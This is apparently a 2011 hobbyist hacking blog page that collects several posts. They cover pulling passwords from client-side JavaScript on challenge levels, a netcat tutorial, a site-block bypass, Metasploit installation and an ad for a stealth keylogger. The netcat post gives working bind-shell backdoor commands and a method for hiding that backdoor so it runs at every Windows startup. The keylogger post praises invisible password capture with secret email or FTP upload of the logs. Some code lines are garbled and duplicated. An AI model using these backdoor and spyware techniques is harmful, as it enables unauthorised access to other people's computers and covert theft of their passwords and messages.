WELCOME

for any suggestion's please mail to this id:

nanduriraja537@gmail.com,raja.mic539@gmail.com

Tuesday, March 8, 2011

Learn Basic JavaScript Hacking: How to Hack with Java Script


Basic JavaScript hacking

LEVEL 1
You must first obtain the "source code": Set the security of Internet Explorer to high, click on the link to level 1 at the very top of the menu bar, Internet Explorer, the File, Edit, View, etc. Press the "View", "Source".This will take it up a Notepad window. Look for:

passwort=prompt("Please enter password!","") passwort = prompt ( "Please enter password !","")

This ensures a prompt box you can write in, that you enter as a password is stored in the variable "passwort".

if (passwort=="easy") if (passwort == "easy")

This checks on "passwort" (what you type) is "easy", the password for level 1 is when the "easy".

Set back security to medium and click on the link to the Level 1and type "easy".

Use the same procedure to obtain the "source code".

LEVEL 2
Once you have retrieved the Notepad window, there will be a lot of code. Just scroll further down, find this:

var m1, i; was m1, i;
m1="JavaScript"; m1 = "JavaScript";
value=prompt("Please enter password!",""); value = prompt ( "Please enter password !","");
if (value==m1) { if (value == m1) (
window.location=value+".htm"; window.location = value + ". htm";
i=4; i = 4;


What you type being stored in the variable "value",

if (value==m1) if (value == m1)

"m1" is a variable that contains a value. See further up:

m1="JavaScript " m1 = "JavaScript"
The password is "JavaScript".

How to Scan Open Ports on Your System to Protect From Hackers


Check if Ur Ports are Hacked or NOT

info:Port Scan

This server will now attempt to open several common ports on your computer. The results of these attempts will be displayed on this page as Open, Closed, or Secure:

If your firewall is configured to block a port, and it is operating correctly, you will see Secure and an event will be logged on your firewall.

A Closed port indicates that the port is reachable but there is no program currently accepting connections there.

If the port is indicated as Open there is an application or service on your computer actively accepting connections.

The time to check each port will range from less than a second up to 20 seconds. Ports which are Secure will take the most time and if u are secured after the test ends tells u

Test complete.
No open ports were found

http://probe.hackerwatch.org/probe/probe.asp

Check it out

Hack PC & System using Netcat: BASIC NETCAT TUTORIAL


NETCAT TUTORIAL

Setting up and Connecting to a "target" computer


First off make sure you have netcat installed on your "attacking" computer and your "target" computer. It does not matter if the computer is running unix or windows.

To be able to connect to this "target" you must first start netcat on the "target" computer so your "attacking" computer can connect.

Windows: Open up a command prompt and make sure you are in the same directory as nc.exe (netcat). Then type "nc -L -p 10002 -d -e cmd.exe"

This will open up a port on 10002 for you to connect to on your "attacking" computer, and when you connect you will be at the "target" computer's command prompt. To connect to the "target" computer open up a command prompt and type "nc 192.168.1.1 10002", this will connect you to your "target's" computer.

(I have not tested this on linux, I have only backdoored windows so I am not positive these commands work properly"

Unix: Open up a konsole. Then type "netcat -L -p 10002 -d -e konsole"

This will open up a port on 10002 for you to connect to on your "attacking" computer, and when you connect you will be at the "target" computer's command prompt. To connect to the "target" computer open up a command prompt and type "netcat 192.168.1.1 10002", this will connect you to your "target's" computer.

-L Tells netcat to not close and wait for a connection

-p Tells netcat which port to listen on

-d Tells netcat to detach from the process we want it to run

-e Tells netcat which program to run after the port is connected


Transferring files through netcat

To send a file through net cat enter the command "start nc.exe -l -p 1234 >file.txt" after you have connected to a windows machine. The -p 1234 is the port netcat listens on, >file.txt is the file to be recieved through netcat.

Enter this in a konsole on the "attacking" computer "netcat 192.168.1.1 1234

Running netcat on startup hidden


Make a batch file with the command "nc -L -p 10002 -d -e cmd.exe" in it. Name this file start.bat and place it the root of your C drive. Download the program cmdow.exe. Make a batch file and name it hide.bat. Inside the file type "cmdow /RUN /HID C:\start.bat". Place this file inside the startup folder.

Now everytime the computer boots netcat will start hidden.

How to Bypass Imageshack Block: Hack Imageshack



Bypass Imageshack Block
1. Get firefox if you don't have it already
2. Download and install this add-on
https://addons.mozilla.org/firefox/953/
3. restart firefox after install
4. Open the options (bottom right of ff)
5. Click add site
6. In site put : imageshack.us
7. Make the action Custom and put in textbox : www.google.com
8. hit okay

Its Done :)

Tuesday, February 15, 2011

Advanced IP Scanner 2.0 Portable download for free



Advanced IP Scanner 2.0 Portable download for free



Advanced IP Scanner is a fast Local Area Network (LAN) scanner for Windows. It is very easy to use and give you various types of useful information about local network computers in a few seconds. It gives you one-click access to many useful functions – remote shutdown and wake up, Radmin integration and more! Powered with multi-thread scan technology, this program can scan hundreds computers per second, allowing you to scan ‘C’ or even ‘B’ class network even from your modem connection.

Features of Advanced IP Scanner:
· Fast and stable multi-threaded IP scanning: You can scan hundreds of IP addresses simultaneously and with great speed – on Pentium-based machines Advanced IP Scanner scans class “B” and “C” networks in a few seconds! You can configure Advanced IP Scanner to scan in many priority levels, set number of maximum threads and so on.
· Remote shutdown: This shuts down any remote machine with NT or Win2k operating system. You can use your default access rights or specify login and password to shutdown.
· Wake-On-LAN: You can wake any machine remotely, if “Wake-on-LAN” feature is supported by your network card.
· Group operations: Any feature of Advanced IP Scanner can be used with any number of selected computers. For example, you can remotely shut down a complete computer class with a few clicks.
· Lists of computers saving and loading: This enables you to perform operations with a specific list of computers. No problems – just save a list of machines you need and Advanced IP Scanner will load it at start up automatically.
· Radmin integration: This enables you to connect via Radmin (if it’s installed) to remote computers with just one click.

Sunday, February 13, 2011

INSTALL METASPLOIT ON UBUNTU


HI FRIENDS ,
TO INSTALL METASPLOIT ON UBUNTU WITHIN FEW SECOND YOU JUST NEED TO FOLLOW THE STEPS:
1) DOWNLOAD METASPLOIT TAR BALL
2)DOWNLOAD INSTALLMSF.SH SHELL SCRIPT.
3)NOW JUST OPEN YOUR TERMINAL AS ROOT
BY FOLLOWING COMMANDS
"sudo -s"
ENTER YOUR PASSWORD FOR CURRENT USER
NOW YOU ARE AT ROOT ;-)

4)COPY THE METASPLOIT TAR BALL IN YOUR HOME FOLDER

5)RUN THE INSTALLMSF.SH SCRIPT ON TERMINAL BY
"bash installmsf.sh"

6)SOME TIMES YOU WILL ASK FOR YES OR NO [Y/N]
JUST ENTER "Y" UNTIL YOUR PROMPT APPEARS.

NOTE: IF NEWER VERSION OF FRAMEWORK YOU ARE USING TO INSTALL YOU MUST HAVE TO DO SOME CHANGES IN SCRIPT IN "tar xf framework-3.5.X.tar.bz2"
ENTER YOUR VERSION IN PLACE OF "X".

FOR ANY KIND OF INFO PLEASE LEAVE COMMENTS
ENJOY FRIENDS ;-)

Thursday, January 27, 2011

free download Award keylogger



Award keylogger

Award Keylogger is fast, invisible and easy-to-use surveillance tool that allows you to find out what other users do on your computer in your absence. It records every keystroke to a log file. The log file can be sent secretly with email or FTP to a specified receiver. Award Keylogger can also detection specified keywords and take a screenshot whenever one is typed, displaying findings in a tidy log viewer. It causes no suspicious slowdowns and takes very few system resources. all this is happening in full stealth mode so the person you are monitoring will never be aware of it.

Main Features:
New! Run keylogger as a Windows service
Easy-to-use, even for beginners
Absolutely invisible/stealth mode
Logs accounts and passwords typed in the every application, (Only Award Keylogger Pro can record passwords in IE7/8/9)
Logs message typed in all instant messengers
Visual surveillance, support screenshots view
Slide show for screenshots
Captures the contents behind the asterisks
Captures mouse clicks
Logs websites visited (Award Keylogger Pro only)
Captures AOL/AIM/Yahoo/ICQ chats
Keyword Detection and Notification
Records contents of password protected web pages, including Web Mail messages
Logs Windows Clipboard
Sends log by e-mail
Uploads ALL logs into the separate folders by FTP
Invisible for the firewall program
Invisible in the Windows startup list
Monitors all users of the PC
User friendly HTML file format for emailed logs
Invisible in Windows NT/2000/XP Task Manager and Windows 9.x/Me Task List
Records Windows 9.x/Me/2000/XP/VISTA logon passwords
Intercepts DOS-box and Java-chat keystrokes
Supports international keyboards
External log viewer
Supports printing of the log
Optimized for Windows XP
Exports log to HTML

Download Here:

LinkWithin

Related Posts Plugin for WordPress, Blogger...